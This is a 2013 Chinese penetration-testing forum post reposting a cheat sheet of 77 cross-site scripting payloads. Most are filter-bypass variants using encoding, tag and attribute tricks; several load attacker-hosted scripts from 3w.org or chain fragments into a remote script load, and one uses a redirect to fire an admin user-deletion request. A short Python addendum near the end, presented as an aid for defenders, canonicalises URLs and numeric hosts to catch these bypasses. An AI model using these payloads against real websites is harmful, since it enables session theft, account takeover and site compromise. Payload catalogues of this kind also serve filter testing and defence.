中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: XSS Attack Roundup
Author: admin
Time: 2013-4-19 19:22
It seems t00ls has rather little material on XSS, so I'm copying over something good I came across; not sure whether any of you need to bookmark it.

(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)

<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding, without semicolons (calculator)

<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)

<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript

<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript

<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line injected JavaScript; this is an extreme XSS example

<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (all fragments must be on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267

(17) Null character

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically useless domestically, because there is nowhere to exploit them

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in the IMG tag

<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaped JavaScript

\";alert('XSS');//

(30) End TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image

<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY('XSS')>

(34) IMG Dynsrc

<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc

<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript

<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META with URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image followed by extra characters (1-32&34&39&160&8192-8&13&12288&65279)

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split expression

<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)

<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method

exppression(alert("XSS"))'>

(53) STYLE background

<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS

<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript in Flash, you can smuggle in your XSS code

a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS payload

<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that

<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command, can execute arbitrary commands

<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)

Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters

<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)

<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)

<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)

<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)

<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)

<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass

<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding

<A HREF="http://3w.org">XSS</A>

(70) Decimal IP

<A HREF="http://3232235521">XSS</A>

(71) Hex IP

<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP

<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding

<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]

<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]

<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot

<A HREF="http://www.google.com./">XSS</A>

(77) javascript link

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source:
http://fuzzexp.org/u/0day/?p=14
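The encoding tricks in items 4 through 19 and 47 above (case changes, HTML character references, embedded tabs, newlines and NUL bytes, leading control characters) all defeat a filter that looks for the literal string "javascript:", and items 70 through 73 defeat a host allowlist that compares the raw host string. The Python below is an added example for defenders and is not part of the original post or of the cheat sheet it copies: it canonicalises an attribute URL the way a lenient browser parser does before checking the scheme, and resolves the legacy numeric host forms to a dotted quad so an allowlist sees the real address. The function names (`url_scheme`, `is_script_url`, `canonical_ipv4_host`) and the sample inputs in the demo are my own constructions, built from the vectors listed above.

```python
"""Defensive canonicalisation for URL-bearing HTML attributes (added example)."""
import html
import ipaddress
import re
from typing import Optional

# Control characters and blanks that lenient HTML/URL parsers drop or ignore
# inside a scheme: NUL, tab, CR, LF and leading spaces (items 11-19 and 47).
_SCHEME_NOISE = re.compile(r"[\x00-\x20\x7f]")

# Schemes that hand the value to a script engine; the post uses both.
SCRIPT_SCHEMES = frozenset({"javascript", "vbscript"})

# One numeric label of a legacy IPv4 host: hex (0x..), octal (leading 0) or decimal.
_IPV4_LABEL = re.compile(r"0[xX][0-9a-fA-F]+|[0-9]+")


def url_scheme(attr_value: str) -> Optional[str]:
    """Return the lower-cased scheme a browser would see, or None when the
    value has no scheme at all (a relative URL)."""
    decoded = html.unescape(attr_value)            # &#106; / &#x6A; / &#106 -> "j"
    head, sep, _rest = decoded.partition(":")
    if not sep:
        return None
    scheme = _SCHEME_NOISE.sub("", head).lower()   # drop NUL, tab, CR, LF, spaces
    return scheme or None


def is_script_url(attr_value: str) -> bool:
    """True when the attribute value resolves to a script-executing scheme."""
    return url_scheme(attr_value) in SCRIPT_SCHEMES


def canonical_ipv4_host(host: str) -> Optional[str]:
    """Resolve decimal, hex, octal, mixed and dot-shortened numeric hosts
    (items 70-73) to a dotted quad; None for anything not purely numeric."""
    labels = host.split(".")
    if not 1 <= len(labels) <= 4:
        return None
    values = []
    for label in labels:
        if not _IPV4_LABEL.fullmatch(label):
            return None
        try:
            if label[:2].lower() == "0x":
                values.append(int(label, 16))
            elif len(label) > 1 and label[0] == "0":
                values.append(int(label, 8))        # "08" raises -> not an IP
            else:
                values.append(int(label, 10))
        except ValueError:
            return None
    # Every label but the last is one octet; the last fills the remaining
    # bytes, which is how "3232235521" alone covers all four.
    last = values.pop()
    remaining = 4 - len(values)
    if any(v > 255 for v in values) or last >= 256 ** remaining:
        return None
    packed = 0
    for v in values:
        packed = (packed << 8) | v
    packed = (packed << (8 * remaining)) | last
    return str(ipaddress.IPv4Address(packed))


if __name__ == "__main__":
    # Constructed samples, taken from the vectors listed in the post.
    for sample in ["JaVaScRiPt:alert('XSS')",
                   "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
                   "jav&#x09;ascript:alert('XSS')",
                   "java\x00script:alert('XSS')",
                   "&#14; javascript:alert('XSS')",
                   "http://3w.org/XSS/xss.js"]:
        print(f"{sample!r:72} script={is_script_url(sample)}")
    for host in ["3232235521", "0xc0.0xa8.0x00.0x01", "0300.0250.0000.0001",
                 "66.000146.0x7.147", "www.google.com"]:
        print(f"{host:25} -> {canonical_ipv4_host(host)}")
```

The point of the check is ordering: decode character references first, strip the characters the browser ignores second, and only then compare the scheme; a blacklist that tests the raw string in any other order is bypassed by every vector in items 4 through 19. Rejecting a numeric host after canonicalisation is likewise safer than matching the text of the href.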
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2